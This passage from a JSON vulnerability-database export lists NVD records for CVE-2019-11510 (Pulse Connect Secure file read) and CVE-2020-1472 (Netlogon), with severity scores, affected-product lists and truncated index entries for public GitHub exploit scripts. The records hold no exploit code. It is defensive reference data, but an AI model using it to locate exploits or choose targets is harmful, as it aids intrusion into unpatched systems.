"2023-03-24T17:36:00", "cpe": ["cpe:/a:pulsesecure:pulse_connect_secure:8.3", "cpe:/a:pulsesecure:pulse_connect_secure:8.2", "cpe:/a:pulsesecure:pulse_connect_secure:9.0"], "id": "CVE-2019-11510", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-11510", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:pulsesecure:pulse_connect_secure:9.0:r2.1:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:8.2:r5.1:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:8.2:r11.0:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:8.2:r4.0:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:8.3:r2:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:8.2:r6.0:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:8.3:r6.1:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:8.2:r7.1:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:8.3:r5.2:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:8.2:r8.0:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:8.3:r5:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.0:r3.2:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.0:r3:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:8.3:r7:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:8.3:r5.1:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:8.2:r1.1:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:8.2:r8.2:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.0:r3.3:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:8.2:r10.0:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:8.3:r4:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.0:r3.1:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:8.3:r3:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:8.2:r3.0:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:8.3:r1:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:8.2:r9.0:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:8.2:r2.0:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:8.2:r3.1:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:8.2:r12.0:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:8.3:r6:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:8.2:r1.0:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:8.2:r8.1:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.0:r2:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.0:r1:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:8.2:r7.0:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:8.2:r4.1:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:8.2:r5.0:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:8.3:r2.1:*:*:*:*:*:*"]}, {"lastseen": "2023-06-06T14:25:04", "description": "An elevation of privilege vulnerability exists when an attacker establishes a vulnerable Netlogon secure channel connection to a domain controller, using the Netlogon Remote Protocol (MS-NRPC), aka 'Netlogon Elevation of Privilege Vulnerability'.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-08-17T19:15:00", "type": "cve", "title": "CVE-2020-1472", "cwe": ["CWE-330"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2022-04-26T17:06:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:16.04", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_server_2016:1909", "cpe:/o:debian:debian_linux:9.0", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:fedoraproject:fedora:33", "cpe:/o:fedoraproject:fedora:31", "cpe:/o:opensuse:leap:15.2", "cpe:/o:fedoraproject:fedora:32", "cpe:/o:microsoft:windows_server_2016:1903", "cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:canonical:ubuntu_linux:14.04", "cpe:/o:opensuse:leap:15.1", "cpe:/o:canonical:ubuntu_linux:18.04", "cpe:/a:oracle:zfs_storage_appliance_kit:8.8", "cpe:/o:canonical:ubuntu_linux:20.04"], "id": "CVE-2020-1472", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-1472", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:esm:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:20.04:*:*:*:lts:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:esm:*:*:*", "cpe:2.3:o:opensuse:leap:15.2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1903:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:32:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*", "cpe:2.3:a:oracle:zfs_storage_appliance_kit:8.8:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:31:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:33:*:*:*:*:*:*:*"]}], "githubexploit": [{"lastseen": "2021-12-10T14:30:50", "description": "# pulsexploit\nAutomated script for Pulse Secure SSL VPN exploit ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2019-12-07T17:09:24", "type": "githubexploit", "title": "Exploit for Path Traversal in Pulsesecure Pulse Connect Secure", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510"], "modified": "2021-12-05T21:57:04", "id": "31DB22CD-3492-524F-9D26-035FC1086A71", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-10T18:30:15", "description": "# pwn-pulse.sh\n**Exploit for Pulse Connect Secure SSL VPN arbitr...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2019-09-09T15:58:39", "type": "githubexploit", "title": "Exploit for Path Traversal in Pulsesecure Pulse Connect Secure", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510"], "modified": "2022-07-10T18:18:14", "id": "B042A63E-E661-5B8E-9AA1-F0DEE4C18402", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-12T06:25:19", "description": "SUMMARY\n-------\nSimple NSE script to detect Pulse Secure SSL VPN...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2019-08-27T03:04:19", "type": "githubexploit", "title": "Exploit for Path Traversal in Pulsesecure Pulse Connect Secure", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510"], "modified": "2022-07-12T05:49:07", "id": "765DCAD5-2789-5451-BBFA-FAD691719F7A", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:17:27", "description": "# CVE-2019-11510-1\n\n## Exploit for Arbitrary File Read on...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2019-08-27T09:21:10", "type": "githubexploit", "title": "Exploit for Path Traversal in Pulsesecure Pulse Connect Secure", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510"], "modified": "2021-12-05T21:57:04", "id": "52814444-4FCC-517B-B4B3-6DC5C4A27AA6", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:17:31", "description": "# CVE-2019-11510 PoC\n\nPython script to explo...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2019-08-26T23:30:15", "type": "githubexploit", "title": "Exploit for Path Traversal in Pulsesecure Pulse Connect Secure", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}